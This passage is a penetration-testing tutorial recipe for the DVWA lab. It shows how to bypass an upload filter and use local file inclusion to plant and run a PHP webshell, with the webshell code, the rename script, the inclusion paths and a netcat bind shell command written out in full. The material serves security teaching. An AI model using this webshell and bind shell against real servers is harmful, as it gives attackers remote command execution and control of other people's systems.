As we saw in Chapter 4, Finding Vulnerabilities, file inclusion vulnerabilities occur when developers use poorly validated input to generate file paths and use those paths to include source code files. Modern versions of server-side languages, such as PHP since 5.2.0, have by default disabled the ability to include remote files, so it has been less common to find an RFI since 2011.
In this recipe, we will first upload a couple of malicious files, one of them is a webshell (a web page capable of executing system commands in the server), and then execute them using local file inclusions.
We will use Damn Vulnerable Web Application (DVWA) in the vulnerable_vm for this recipe and will have it with a medium level of security, so let's set it up:
- Navigate to
http://192.168.56.102/dvwa. - Log in.
- Set the security level to medium: Go to DVWA Security, select medium in the combo box and click on Submit.
We will upload some files to the server, but you need to remember where they are stored, in order to be able to call them again; so, go to Upload in DVWA and upload any JPG image. If it's successful, it will say that the file was uploaded to ../../hackable/uploads/. Now we know the relative path where it saves the uploaded files; that's enough for this recipe.
We also need to have our files ready; so let's create a new text file with the following content:
<? system($_GET['cmd']); echo '<form method="post" action="../../hackable/uploads/webshell.php"><input type="text" name="cmd"/></form>'; ?>
Save it as webshell.php. We will need another file, create rename.php and put the following code in it:
<?
system('mv ../../hackable/uploads/webshell.jpg ../../hackable/uploads/webshell.php');
?>This file will take a specific image file (webshell.jpg) and rename it for webshell.php.
- First, let's try to upload our webshell; in DVWA go to Upload and try to upload
webshell.php, as shown:
So, there is a validation of what we can upload and what we can't. This means that we will need to upload an image file or more precisely, an image file with a
.jpg,.gif, or.pngextension. This is why we need the renamer script to return the.phpextension to the original file and then be able to execute it. - To avoid errors at validation, we need to rename our PHP files with a valid extension. In a terminal, we will go to the directory where PHP files are stored and create copies of them:
cp rename.php rename.jpg cp webshell.php webshell.jpg
- Now, let's go back to DVWA and try to upload both of them again:
- Once both the JPG files are uploaded, we will use the local file inclusion vulnerabilities to execute
rename.jpg. Go to the File Inclusion section and exploit the vulnerability including../../hackable/uploads/rename.jpg.
We don't have any output for the execution of this file, we will need to assume that
webshell.jpgis now namedwebshell.php. - If it worked, we should now be able to include
../../hackable/uploads/webshell.php, let's try it:
- In the text box seen in the top-left corner, write
/sbin/ifconfigand hit Enter:
And it worked! As seen in the image, the server has the 192.168.56.102 IP address. Now, we can execute commands in the server by typing them in the textbox or setting a different value for the
cmdparameter.
The first test that we did when we uploaded a valid JPG was meant to discover the path where the uploaded files are saved; so we can use this path in rename.php and in the action field of the form.
It is necessary to use a rename script for two reasons: first, the upload page only allows JPG files, so our scripts will need to have that extension; and second, we will need to call our webshell with parameters (the commands to execute); we cannot use parameters when calling a JPG image from a web server.
The system() function of PHP is the core of the attack; what it does is, it invokes a system command and displays its output. This allows us to rename the webshell file from .jpg to .php and to execute the commands we specify as GET parameters.
Once we upload and execute the server-side code, there are a huge number of options that we can take to compromise the server; for example, the following command is what we call a bind shell:
nc -lp 12345 -e /bin/bash
It will open the TCP port 12345 in the server and listen for a connection, when the connection succeeds, it will execute /bin/bash and receive its input and send its output through the network to the connected host (the attacking machine).
It is also possible to make the server download some malicious program; for example, a privilege escalation exploit and execute it to become a user with more privileges.